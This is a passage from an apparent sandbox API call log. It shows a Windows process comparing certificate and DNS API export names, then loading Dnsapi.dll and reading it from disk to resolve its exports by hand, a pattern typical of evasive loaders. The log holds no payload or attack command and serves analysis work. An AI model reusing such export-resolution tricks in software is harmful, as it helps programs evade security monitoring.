(lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.641] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0240.641] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0240.641] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0240.641] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0240.641] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0240.641] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0240.641] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0240.641] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0240.641] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0240.641] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0240.641] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0240.641] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0240.641] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0240.641] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0240.641] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0240.641] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.641] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0240.641] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0240.641] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0240.641] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0240.641] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0240.641] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0240.641] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0240.642] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0240.642] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0240.642] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0240.642] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0240.642] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0240.643] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0240.643] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0240.643] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0240.643] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0240.643] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0240.644] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0240.644] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0240.645] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0240.645] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0240.646] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0240.646] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0240.646] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0240.646] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0240.646] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0240.646] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0240.646] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0240.646] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0240.646] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0240.646] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0240.646] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0240.646] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0240.665] GetProcessHeap () returned 0x550000 [0240.666] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x4123040 | out: hHeap=0x550000) returned 1 [0240.906] GetProcessHeap () returned 0x550000 [0240.906] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x5690f0 [0240.907] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0240.928] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0240.928] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0240.929] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0240.929] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0240.929] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0240.930] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0240.930] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0240.930] GetProcessHeap () returned 0x550000 [0240.930] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa7b88) returned 0x3a9d010 [0240.932] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0240.932] ReadFile (in: hFile=0x17c, lpBuffer=0x3a9d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a9d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0241.157] CloseHandle (hObject=0x17c) returned 1 [0241.157] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0241.158] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.158] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0241.158] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.158] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.158] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0241.158] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.158] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.158] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0241.158] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0241.158] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.158] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.158] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0241.158] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0241.158] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0241.159] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.159] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.159] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0241.159] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0241.159] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.159] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0241.159] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.159] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.159] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0241.159] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0241.159] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.159] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0241.159] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0241.159] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.159] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.159] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0241.159] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0241.159] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.159] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0241.159] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0241.159] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0241.159] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.159] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.159] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0241.159] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0241.160] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0241.160] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.161] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.161] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0241.161] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0241.161] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.161] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0241.161] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0241.161] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0241.161] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0241.161] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0241.161] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0241.161] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.161] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.161] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0241.161] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0241.161] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.161] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0241.161] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0241.161] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0241.161] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0241.161] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0241.161] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0241.161] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0241.162] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0241.162] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0241.162] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0241.163] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.163] 